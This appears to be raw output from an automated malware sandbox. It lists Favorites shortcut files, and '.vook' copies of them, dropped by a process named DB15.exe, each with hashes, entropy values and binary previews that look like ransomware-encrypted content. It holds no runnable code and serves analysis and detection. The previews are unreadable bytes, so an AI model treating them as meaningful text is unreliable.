                                                                                                                                                                                                                                      C:\Users\user\Favorites\Facebook.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):447
                                                                                                                                                                                                                                      Entropy (8bit):7.424716230764154
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:dWGFSwv1XGiUlJw9eJwafPuDE7UmGRNixpZacii9a:tUwZ6lGirPuiUxRNiTkbD
                                                                                                                                                                                                                                      MD5:614C396B5970BE922D713718EBD2ED96
                                                                                                                                                                                                                                      SHA1:2109B7FC003A2F0D501B21A267D3BAD8CAE63688
                                                                                                                                                                                                                                      SHA-256:1271741DC96120CB0504B6157EE1B0920D2A90F5DA58B7F8414F7D0279DFCF11
                                                                                                                                                                                                                                      SHA-512:D6011301ACAF31914AE98B1D0F803A85938774B0F6EDCDFA194D00E97C5093E5489580338A2BD2289928936E887B3ED11B5CF02C44C0A14FCCA85EC521AFE00C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.J....Rw....&...m;7.'..j..]..;RZx....w.\..o)t!Fy.?..6.\N..2.N.H..]...!.,hI.P...5Ng...v..?#.55V.o:.;.....C....ZB........&#.l.5.#..-.(....41t..{9....;X........~..-M...^......n.f....q..h..u.7Qwt.}:.J...z.M....w.~TF.\..oH.'.1.s._....U..."..a....^.K..cM.3.q...........4#v.*....W..]..+.la...N?..h`QoR.....T].G.'.l.Z..rcD.....d....P.o,..#...Mf.F...Or6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Google.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.4364038387164495
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:pWhAmwvp/iQzLgTMttjqzgTm70oySl8FqX+m3z/ixpZacii9a:pWhLwv1iMtmgTm70oD86HiTkbD
                                                                                                                                                                                                                                      MD5:933967D6BF2059F045C840F0E9F75FCF
                                                                                                                                                                                                                                      SHA1:B5D013D115D3A53E13D5E555810C50BD17BD2B58
                                                                                                                                                                                                                                      SHA-256:945FD493BEAC65AC4A04A62C2C9E1BA9D926A55C91876179DD226843F86B69DF
                                                                                                                                                                                                                                      SHA-512:23AF5019CE560AE8281CECEA9DCFB97E97D50EAC45B6AB0A93EDE7FC8E77A6786B1EE9990B8194DB8C710D0D4D66D39171BE07E1E986E073315D99E0F7261C6F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000#(..L....7.R0.J...J....Q..hJ.JNj..i'I.......1...D.....iy........e.d.....U....A..*Nxl.t.J...4.NQ-.qa....fX..e.U....WK..:H..7..J2N17"{....2...w...l...........Eg..=y.&Bk.G....{=&.+|...z8,,.......S..4.1..;.D.:.....H.....8.#.d......[._.......,......[.C\.wYJo.u........Sl.....\..._.$..H..p.Nsj.T...y..@C..L..H....7.S.f5..k.%.B.D..........;Vvj.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Google.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.4364038387164495
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:pWhAmwvp/iQzLgTMttjqzgTm70oySl8FqX+m3z/ixpZacii9a:pWhLwv1iMtmgTm70oD86HiTkbD
                                                                                                                                                                                                                                      MD5:933967D6BF2059F045C840F0E9F75FCF
                                                                                                                                                                                                                                      SHA1:B5D013D115D3A53E13D5E555810C50BD17BD2B58
                                                                                                                                                                                                                                      SHA-256:945FD493BEAC65AC4A04A62C2C9E1BA9D926A55C91876179DD226843F86B69DF
                                                                                                                                                                                                                                      SHA-512:23AF5019CE560AE8281CECEA9DCFB97E97D50EAC45B6AB0A93EDE7FC8E77A6786B1EE9990B8194DB8C710D0D4D66D39171BE07E1E986E073315D99E0F7261C6F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000#(..L....7.R0.J...J....Q..hJ.JNj..i'I.......1...D.....iy........e.d.....U....A..*Nxl.t.J...4.NQ-.qa....fX..e.U....WK..:H..7..J2N17"{....2...w...l...........Eg..=y.&Bk.G....{=&.+|...z8,,.......S..4.1..;.D.:.....H.....8.#.d......[._.......,......[.C\.wYJo.u........Sl.....\..._.$..H..p.Nsj.T...y..@C..L..H....7.S.f5..k.%.B.D..........;Vvj.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Live.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):443
                                                                                                                                                                                                                                      Entropy (8bit):7.376792185674255
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:O9r11VL1WX8ZYQFkpUeh1l+ijWogJ2ixpZacii9a:O9r1DO4YQ2pUolLj2J2iTkbD
                                                                                                                                                                                                                                      MD5:C77BBAD0CD27A7429B2D639199134BD3
                                                                                                                                                                                                                                      SHA1:4FB1791482380BCB14F58DB45F6648D705A80F1D
                                                                                                                                                                                                                                      SHA-256:227D646239422B95D4D942F2648E9C61E9AD4723567CDE0E1839AC2527EE8A33
                                                                                                                                                                                                                                      SHA-512:521C478F20D9EBD2203C44F23341B8723A9A372821A5C63A8919144D801DC6880EAE15A8C42BE2CE0954F966A78FFFD47FD64D8FC87742D5CF8E77B1CEA3938D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000o..C.A.,!....H.6..d.O].n.)..i.?e.0U@%:.w.J.:z./=.B....t.B....z0.,.C..t|5%.....s.Mw+..vJ-+.S..NCk.G?/.................vtOc@..-....2..d.4w^....p|...t.......w...l.F.5..#.....4...ja..[.....06/.(h&f..3.M.e...7F.{.5.dJ..m-..}4...}G2..8#h...B.....xRy...I.l.. ..4..~...s.L2.hJ..........._>..X....c..w...lVY40"..._..[.Z..O.....B.<....(..8........r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Live.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):443
                                                                                                                                                                                                                                      Entropy (8bit):7.376792185674255
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:O9r11VL1WX8ZYQFkpUeh1l+ijWogJ2ixpZacii9a:O9r1DO4YQ2pUolLj2J2iTkbD
                                                                                                                                                                                                                                      MD5:C77BBAD0CD27A7429B2D639199134BD3
                                                                                                                                                                                                                                      SHA1:4FB1791482380BCB14F58DB45F6648D705A80F1D
                                                                                                                                                                                                                                      SHA-256:227D646239422B95D4D942F2648E9C61E9AD4723567CDE0E1839AC2527EE8A33
                                                                                                                                                                                                                                      SHA-512:521C478F20D9EBD2203C44F23341B8723A9A372821A5C63A8919144D801DC6880EAE15A8C42BE2CE0954F966A78FFFD47FD64D8FC87742D5CF8E77B1CEA3938D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000o..C.A.,!....H.6..d.O].n.)..i.?e.0U@%:.w.J.:z./=.B....t.B....z0.,.C..t|5%.....s.Mw+..vJ-+.S..NCk.G?/.................vtOc@..-....2..d.4w^....p|...t.......w...l.F.5..#.....4...ja..[.....06/.(h&f..3.M.e...7F.{.5.dJ..m-..}4...}G2..8#h...B.....xRy...I.l.. ..4..~...s.L2.hJ..........._>..X....c..w...lVY40"..._..[.Z..O.....B.<....(..8........r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.442564267036381
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:FFfPMBOthHOeqcl7rjUSYpJmKZ8RjTQixpZacii9a:FlPZZl7MP8RTQiTkbD
                                                                                                                                                                                                                                      MD5:DBA7E167C82BC570707277BE4C7541A4
                                                                                                                                                                                                                                      SHA1:6A336E0D9D640F0091BE7A3EBDDA4F092EBE12A8
                                                                                                                                                                                                                                      SHA-256:276ECF66F28C48A4F531018D332AE781424FB1369DC13A0AE419F67C25FCE4D9
                                                                                                                                                                                                                                      SHA-512:D9A0B690A49184FC02AA735DBBEDB58F5BC778B8824E7990DB7E769A135AB64839679D3340DEC6908B76EF457F44360B1EDCFE9D0D4C561684E464DC41354DD8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.KLp'.+......[....+..P.2..!.R.w......jw.p....9.+V.9..e...B....C.......wd........(..........L.<{"E..?.& :.H.m.....v.a{tg..;.w..2...g..t].rl....W..C...O...X...7....Zr.:6.M....'...b...l{[...@.:!.N.<.^Z..f.Z.M m..HK..~>....N:'.@.]l.6|DV.3*I..T...;c.|X........h...).+.J.....x..%......(..!...q.....R{SX.2.8.A......*..`. }.........#..c.3.vdb..u.|<tr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.442564267036381
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:FFfPMBOthHOeqcl7rjUSYpJmKZ8RjTQixpZacii9a:FlPZZl7MP8RTQiTkbD
                                                                                                                                                                                                                                      MD5:DBA7E167C82BC570707277BE4C7541A4
                                                                                                                                                                                                                                      SHA1:6A336E0D9D640F0091BE7A3EBDDA4F092EBE12A8
                                                                                                                                                                                                                                      SHA-256:276ECF66F28C48A4F531018D332AE781424FB1369DC13A0AE419F67C25FCE4D9
                                                                                                                                                                                                                                      SHA-512:D9A0B690A49184FC02AA735DBBEDB58F5BC778B8824E7990DB7E769A135AB64839679D3340DEC6908B76EF457F44360B1EDCFE9D0D4C561684E464DC41354DD8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.KLp'.+......[....+..P.2..!.R.w......jw.p....9.+V.9..e...B....C.......wd........(..........L.<{"E..?.& :.H.m.....v.a{tg..;.w..2...g..t].rl....W..C...O...X...7....Zr.:6.M....'...b...l{[...@.:!.N.<.^Z..f.Z.M m..HK..~>....N:'.@.]l.6|DV.3*I..T...;c.|X........h...).+.J.....x..%......(..!...q.....R{SX.2.8.A......*..`. }.........#..c.3.vdb..u.|<tr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Reddit.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.472707159881442
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:JGrgHh4KNF2ozP+MSalm84XWAI5lF281/YrwvS1xrc62I7VNM8N9GHJJI9fjGjGq:3Oo654EO/YrWMnJhNMpiGixpZacii9a
                                                                                                                                                                                                                                      MD5:ADFF8228C5E1015A9C6BAA717046D7AF
                                                                                                                                                                                                                                      SHA1:1051551808B4B9EDD148166508BC41C511D89738
                                                                                                                                                                                                                                      SHA-256:BBA15E61FD1DB6879BBD56E1B9C7218F1274C05D98D1BADDA6C037BAE76729ED
                                                                                                                                                                                                                                      SHA-512:16F26E7F2E1217525C6CBA4CE102EE78A66F76F66581EBF9CBDFA751395EC786331F6DA2BF2C32AF85C30EDBB777AD6F3669DFC49035FDC659E2642902A7899C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000..... .....Z.....4d."...{....2..C...:....j..9q...`.:..%I..).....:.:..Tn..cv...dq..]|.;.K....e..%..;hFKw..'.S.I.p....b%....X.....$?.9...C.U.X..x....\......Y".u.g..S.pHl......^q.)Y.....(.......e7.......N..3Y...;.C.9.......9u.2Upc.,.K./...W......#........,...5~F$".+Wv......dw=...Em.'...U...`2...}. .8s..<.^..j%..4....M....<...l.{+.O:...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Reddit.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.472707159881442
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6:JGrgHh4KNF2ozP+MSalm84XWAI5lF281/YrwvS1xrc62I7VNM8N9GHJJI9fjGjGq:3Oo654EO/YrWMnJhNMpiGixpZacii9a
                                                                                                                                                                                                                                      MD5:ADFF8228C5E1015A9C6BAA717046D7AF
                                                                                                                                                                                                                                      SHA1:1051551808B4B9EDD148166508BC41C511D89738
                                                                                                                                                                                                                                      SHA-256:BBA15E61FD1DB6879BBD56E1B9C7218F1274C05D98D1BADDA6C037BAE76729ED
                                                                                                                                                                                                                                      SHA-512:16F26E7F2E1217525C6CBA4CE102EE78A66F76F66581EBF9CBDFA751395EC786331F6DA2BF2C32AF85C30EDBB777AD6F3669DFC49035FDC659E2642902A7899C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000..... .....Z.....4d."...{....2..C...:....j..9q...`.:..%I..).....:.:..Tn..cv...dq..]|.;.K....e..%..;hFKw..'.S.I.p....b%....X.....$?.9...C.U.X..x....\......Y".u.g..S.pHl......^q.)Y.....(.......e7.......N..3Y...;.C.9.......9u.2Upc.,.K./...W......#........,...5~F$".+Wv......dw=...Em.'...U...`2...}. .8s..<.^..j%..4....M....<...l.{+.O:...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Twitter.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.477781222152723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Klcg1Fpidosj3u6EUTozhK6+vLixpZacii9a:+1FAdRtEU8VKTLiTkbD
                                                                                                                                                                                                                                      MD5:072458FD72704E4D1F08E7B4A8499CC6
                                                                                                                                                                                                                                      SHA1:71E921006D58AFF1C5566A478FE9F4E15FDA7493
                                                                                                                                                                                                                                      SHA-256:A6EBC4F8CAC51DDFAF22A5990C09BF034B872096775FEE98B59937328B2E5442
                                                                                                                                                                                                                                      SHA-512:BC2B723F07B241072B8AC876A6BDC2BDFD7DACD637E33F7888586B49E3891557F46D040E143AF316988525974F96BCBF05DB57C40B5090CB7851B77B8B42A820
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.....1....x...x.......Y57V.tW.G.@...F.....'.e!Pz.S#......gEs.\x%Ax..6p..y..n@=.aC......Z.cS....~....e....|.;:.=S..T...q6.x=.....!sU..Gs...`r.I.g.B.#...tc.H....V.|.h)....`+Hc.....w\.......F.)..C.E....]._.]C...<.j.............!'.[wm.t.2.m..>Y.dn....=(..b/$..zi.oS..L. ...Gc..8.......Yg..Dn._.^..LQ.m..x.{.:x..yEI......~=..j.....qu.u...g........1..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Twitter.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.477781222152723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Klcg1Fpidosj3u6EUTozhK6+vLixpZacii9a:+1FAdRtEU8VKTLiTkbD
                                                                                                                                                                                                                                      MD5:072458FD72704E4D1F08E7B4A8499CC6
                                                                                                                                                                                                                                      SHA1:71E921006D58AFF1C5566A478FE9F4E15FDA7493
                                                                                                                                                                                                                                      SHA-256:A6EBC4F8CAC51DDFAF22A5990C09BF034B872096775FEE98B59937328B2E5442
                                                                                                                                                                                                                                      SHA-512:BC2B723F07B241072B8AC876A6BDC2BDFD7DACD637E33F7888586B49E3891557F46D040E143AF316988525974F96BCBF05DB57C40B5090CB7851B77B8B42A820
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.....1....x...x.......Y57V.tW.G.@...F.....'.e!Pz.S#......gEs.\x%Ax..6p..y..n@=.aC......Z.cS....~....e....|.;:.=S..T...q6.x=.....!sU..Gs...`r.I.g.B.#...tc.H....V.|.h)....`+Hc.....w\.......F.)..C.E....]._.]C...<.j.............!'.[wm.t.2.m..>Y.dn....=(..b/$..zi.oS..L. ...Gc..8.......Yg..Dn._.^..LQ.m..x.{.:x..yEI......~=..j.....qu.u...g........1..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                      Entropy (8bit):7.475353791839102
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:VIDg/dyOq9i32rklw7ydMC1Hc3gRY4pfPQxr3mxoixpZacii9a:fdqA3KyfcgQdliTkbD
                                                                                                                                                                                                                                      MD5:2E357557669977D4C921A0440EFB195F
                                                                                                                                                                                                                                      SHA1:20A575795CC1E308D6EECF2A1616D064016A145A
                                                                                                                                                                                                                                      SHA-256:CD40DDBC45A928A430FD1711F21B69EB4DCF4DBF3EC8DFFAF5FDE2D29569B261
                                                                                                                                                                                                                                      SHA-512:BD42103D8606F10A03A8A9E1ED1A3C14358EA516CEC87E054CD11A3B6E57EA0F57E6009E3D45D6D332201E4FE953A557974316CA7CAA0F65C03ACC5A41FD0425
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000...f.4....Q"i$..)L.b..z....w.c...'QT....w...-F...y..S.....N...-...w...*.{.m.....}..u.~n.d.S..X.....J......q..uHbP....m.b+....v...a..g@>...@%0+oN..5..)b[.W..4D5.U.&..`q.2...S..(...}v..8....~..2L...3..5...X.......b.-.I.rR...l,.b..M.SD.l.A.+......`..)!....h.......r...md.:.g....N.4.v..`.Z..{3.C......rk.u.W..#iYO.z...[.K....b.\j............../%....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                      Entropy (8bit):7.475353791839102
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:VIDg/dyOq9i32rklw7ydMC1Hc3gRY4pfPQxr3mxoixpZacii9a:fdqA3KyfcgQdliTkbD
                                                                                                                                                                                                                                      MD5:2E357557669977D4C921A0440EFB195F
                                                                                                                                                                                                                                      SHA1:20A575795CC1E308D6EECF2A1616D064016A145A
                                                                                                                                                                                                                                      SHA-256:CD40DDBC45A928A430FD1711F21B69EB4DCF4DBF3EC8DFFAF5FDE2D29569B261
                                                                                                                                                                                                                                      SHA-512:BD42103D8606F10A03A8A9E1ED1A3C14358EA516CEC87E054CD11A3B6E57EA0F57E6009E3D45D6D332201E4FE953A557974316CA7CAA0F65C03ACC5A41FD0425
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000...f.4....Q"i$..)L.b..z....w.c...'QT....w...-F...y..S.....N...-...w...*.{.m.....}..u.~n.d.S..X.....J......q..uHbP....m.b+....v...a..g@>...@%0+oN..5..)b[.W..4D5.U.&..`q.2...S..(...}v..8....~..2L...3..5...X.......b.-.I.rR...l,.b..M.SD.l.A.+......`..)!....h.......r...md.:.g....N.4.v..`.Z..{3.C......rk.u.W..#iYO.z...[.K....b.\j............../%....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Youtube.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.412880961866832
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:6BwuJqONgLQfqq+xlevDXZ2U0E9cqhXJixpZacii9a:CwuJqO+LjxcDXZt0E9cqhZiTkbD
                                                                                                                                                                                                                                      MD5:3AD9CC721D6DBE717F8805DA89E15D1E
                                                                                                                                                                                                                                      SHA1:00CE17C397DF18630500EF7CD9A3E2EB52A635FD
                                                                                                                                                                                                                                      SHA-256:FB81E7D59B4F8EDA1D5242699A2541A3E9F9CDC27F524FBBBFB088E5F3B423CE
                                                                                                                                                                                                                                      SHA-512:1A1CEB67D498DAF6BDD979F95E78428C23FAC146BC508F7AE517405DCC0C80B2A7A946C5D22337338147A082297E49E362CF5FD80A92292F64E9683AABE53B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000A...`......k.h....!...>...]...4.r..w..&....E.Qq...Q.\..r<.6.W. .B.mm..^..D..LZ.....LQ..t..3}.-...T..+.8f.s........AL...-m.....n.dYO.`$..[.pY.V..K....%S.....W..4.....e=..b.A....J..........<)..#.R...TQ-D.....8GN...e......Z.[....R..H1...b95x0U.Bw.7gv...;...9C.49..Li..q_K.+.g<.o..N..T.....q.p.HD..D.q=.G... ...xSU.-.g....v.(..P....o&O.[0D.....IQ.V8.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Youtube.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):446
                                                                                                                                                                                                                                      Entropy (8bit):7.412880961866832
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:6BwuJqONgLQfqq+xlevDXZ2U0E9cqhXJixpZacii9a:CwuJqO+LjxcDXZt0E9cqhZiTkbD
                                                                                                                                                                                                                                      MD5:3AD9CC721D6DBE717F8805DA89E15D1E
                                                                                                                                                                                                                                      SHA1:00CE17C397DF18630500EF7CD9A3E2EB52A635FD
                                                                                                                                                                                                                                      SHA-256:FB81E7D59B4F8EDA1D5242699A2541A3E9F9CDC27F524FBBBFB088E5F3B423CE
                                                                                                                                                                                                                                      SHA-512:1A1CEB67D498DAF6BDD979F95E78428C23FAC146BC508F7AE517405DCC0C80B2A7A946C5D22337338147A082297E49E362CF5FD80A92292F64E9683AABE53B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000A...`......k.h....!...>...]...4.r..w..&....E.Qq...Q.\..r<.6.W. .B.mm..^..D..LZ.....LQ..t..3}.-...T..+.8f.s........AL...-m.....n.dYO.`$..[.pY.V..K....%S.....W..4.....e=..b.A....J..........<)..#.R...TQ-D.....8GN...e......Z.[....R..H1...b95x0U.Bw.7gv...;...9C.49..Li..q_K.+.g<.o..N..T.....q.p.HD..D.q=.G... ...xSU.-.g....v.(..P....o&O.[0D.....IQ.V8.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1193
                                                                                                                                                                                                                                      Entropy (8bit):7.835357099902493
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:peXi8HQ6gxuraadwpmkGheAsIrxjvEzXYpQ8eo/G0F42FZEuqGDALXt05wHiiTkX:syqQLxG2ZIh1rEUhe2LZP58L+5ciD
                                                                                                                                                                                                                                      MD5:1B6769383183F6BF775F8D2A2C4AD606
                                                                                                                                                                                                                                      SHA1:84265CD4E320210A09DB1116E4AF42E7DEDCC3F8
                                                                                                                                                                                                                                      SHA-256:C514D4D37296D8C94700C6DB3EFD9ED1D2953B5BC8B447FB67A57EA841CE5D0A
                                                                                                                                                                                                                                      SHA-512:A01E7F5B3E3592060E70C25DFF5C7E041A3B61524E7CBF2E0FDBEE23F422D1FA9F7FE309C96829751729EC747784C542F5D455CC026B78536C18DE686C3216B3
                                                                                                                                                                                                                                      Malicious:false
